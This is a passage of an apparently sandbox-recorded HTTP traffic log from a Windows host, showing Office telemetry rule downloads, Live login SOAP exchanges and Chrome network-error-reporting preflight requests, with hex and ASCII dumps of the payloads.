                                                                          2024-12-08 19:51:24 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          80192.168.2.44984313.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:24 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:24 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:24 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 428
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                          ETag: "0x8DC582BAC4F34CA"
                                                                          x-ms-request-id: 7b99b195-101e-0017-7009-4847c7000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195124Z-r1cf579d778t5c2lhC1EWRce3w00000006x0000000008ea2
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:24 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          81192.168.2.44984420.190.147.8443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:25 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/soap+xml
                                                                          Accept: */*
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                          Content-Length: 4775
                                                                          Host: login.live.com
                                                                          2024-12-08 19:51:25 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                          2024-12-08 19:51:26 UTC569INHTTP/1.1 200 OK
                                                                          Cache-Control: no-store, no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                          Expires: Sun, 08 Dec 2024 19:50:25 GMT
                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                          x-ms-route-info: C510_BAY
                                                                          x-ms-request-id: cbdcbabf-8f56-4e1a-af11-d26c0db7b0ba
                                                                          PPServer: PPV: 30 H: PH1PEPF0001B6DB V: 0
                                                                          X-Content-Type-Options: nosniff
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          X-XSS-Protection: 1; mode=block
                                                                          Date: Sun, 08 Dec 2024 19:51:26 GMT
                                                                          Connection: close
                                                                          Content-Length: 11410
                                                                          2024-12-08 19:51:26 UTC11410INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          82192.168.2.44984520.190.147.8443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:25 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/soap+xml
                                                                          Accept: */*
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                          Content-Length: 3592
                                                                          Host: login.live.com
                                                                          2024-12-08 19:51:25 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                          2024-12-08 19:51:26 UTC569INHTTP/1.1 200 OK
                                                                          Cache-Control: no-store, no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                          Expires: Sun, 08 Dec 2024 19:50:25 GMT
                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                          x-ms-route-info: C510_BL2
                                                                          x-ms-request-id: 4b7da3c7-120b-454f-b71a-f0b36f63df89
                                                                          PPServer: PPV: 30 H: BL02EPF0001DA60 V: 0
                                                                          X-Content-Type-Options: nosniff
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          X-XSS-Protection: 1; mode=block
                                                                          Date: Sun, 08 Dec 2024 19:51:25 GMT
                                                                          Connection: close
                                                                          Content-Length: 11390
                                                                          2024-12-08 19:51:26 UTC11390INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          83192.168.2.44984613.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:26 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:26 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:26 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 499
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                          ETag: "0x8DC582B98CEC9F6"
                                                                          x-ms-request-id: 90a12f2a-001e-0079-1603-4812e8000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195126Z-r1cf579d778dndrdhC1EWR4b2400000005xg000000005xhe
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:26 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          84192.168.2.44984713.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:26 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:26 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:26 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 415
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                          ETag: "0x8DC582B988EBD12"
                                                                          x-ms-request-id: 09188c3a-a01e-0021-2702-48814c000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195126Z-r1cf579d7789trgthC1EWRkkfc00000006zg000000003s8d
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:26 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          85192.168.2.44985135.190.80.14431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:26 UTC535OUTOPTIONS /report/v4?s=HCCGsQvdlNc%2BJmxUPQiMeRCM8982DcflmoYcquVM6726eKfELIICtRripthlRXUSrHio2UGj1gLsOdgH5IGc%2Fr2mwHJN9WyTPSehGdGI7Gpitjf9SdA6Z7qNEFVlIkB3fSg%3D HTTP/1.1
                                                                          Host: a.nel.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Origin: https://cdn.jsdelivr.net
                                                                          Access-Control-Request-Method: POST
                                                                          Access-Control-Request-Headers: content-type
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:51:26 UTC336INHTTP/1.1 200 OK
                                                                          Content-Length: 0
                                                                          access-control-max-age: 86400
                                                                          access-control-allow-methods: POST, OPTIONS
                                                                          access-control-allow-origin: *
                                                                          access-control-allow-headers: content-type, content-length
                                                                          date: Sun, 08 Dec 2024 19:51:26 GMT
                                                                          Via: 1.1 google
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          86192.168.2.44985235.190.80.14431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:26 UTC549OUTOPTIONS /report/v4?s=2QVXPr%2FqR5RXP8VAQUov%2Fe5q71OgMdXXymIWqlJDZY0svcQoztNrlByzoVUBye4qKo5Br3bfvdz%2FBN4Lognl34TCrbk4MVDUbQaYRz5JyxQlmp%2Ba8%2B6Wkpt0%2BUP50r6KAiHRxvaA HTTP/1.1
                                                                          Host: a.nel.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Origin: https://cdnjs.cloudflare.com
                                                                          Access-Control-Request-Method: POST
                                                                          Access-Control-Request-Headers: content-type
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:51:26 UTC336INHTTP/1.1 200 OK
                                                                          Content-Length: 0
                                                                          access-control-max-age: 86400
                                                                          access-control-allow-methods: OPTIONS, POST
                                                                          access-control-allow-origin: *
                                                                          access-control-allow-headers: content-length, content-type
                                                                          date: Sun, 08 Dec 2024 19:51:26 GMT
                                                                          Via: 1.1 google
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          87192.168.2.44985335.190.80.14431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:26 UTC549OUTOPTIONS /report/v4?s=EYmntC%2FcD10lxgaAhlff%2Ff9ho3LrZqPX0Y6lGu6F%2ByYlSJxmge5No%2FSnJBL2ETxUu9n%2FDGXYTd%2BobgO%2Fx88HKGkiv3%2FN%2BqN1Rz5foS4Klr2rCIoU7ZUd3SpsUyVGb1O2Kw%3D%3D HTTP/1.1
                                                                          Host: a.nel.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Origin: https://proficocap.com
                                                                          Access-Control-Request-Method: POST
                                                                          Access-Control-Request-Headers: content-type
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:51:26 UTC336INHTTP/1.1 200 OK
                                                                          Content-Length: 0
                                                                          access-control-max-age: 86400
                                                                          access-control-allow-methods: POST, OPTIONS
                                                                          access-control-allow-origin: *
                                                                          access-control-allow-headers: content-type, content-length
                                                                          date: Sun, 08 Dec 2024 19:51:26 GMT
                                                                          Via: 1.1 google
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          88192.168.2.44985435.190.80.14431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:26 UTC545OUTOPTIONS /report/v4?s=BaBa%2Bcls9XuXgYmrVEVw9n%2Bhi9%2F%2BAQrzF8U5ipv6RCLOiYa8iAIomZnG2OE7fSb0hTmYyr8zHA5IYWMJ9z%2BjRGX38WSfY%2Fa54ZhR3f2UUb0bgXN7iYKX3K6%2B1h3zxKm6cQ%3D%3D HTTP/1.1
                                                                          Host: a.nel.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Origin: https://proficocap.com
                                                                          Access-Control-Request-Method: POST
                                                                          Access-Control-Request-Headers: content-type
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:51:27 UTC336INHTTP/1.1 200 OK
                                                                          Content-Length: 0
                                                                          access-control-max-age: 86400
                                                                          access-control-allow-methods: POST, OPTIONS
                                                                          access-control-allow-origin: *
                                                                          access-control-allow-headers: content-length, content-type
                                                                          date: Sun, 08 Dec 2024 19:51:26 GMT
                                                                          Via: 1.1 google
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          89192.168.2.44984813.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:26 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:27 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:27 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 471
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                          ETag: "0x8DC582BB5815C4C"
                                                                          x-ms-request-id: 90f2e2a0-001e-0014-5807-485151000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195127Z-r1cf579d778d5zkmhC1EWRk6h800000006ng000000008zxu
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:27 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          90192.168.2.44984913.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:26 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:27 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:27 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 419
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                          ETag: "0x8DC582BB32BB5CB"
                                                                          x-ms-request-id: 75599bc5-d01e-008e-7c03-48387a000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195127Z-r1cf579d778lntp7hC1EWR9gg400000005n000000000a47v
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
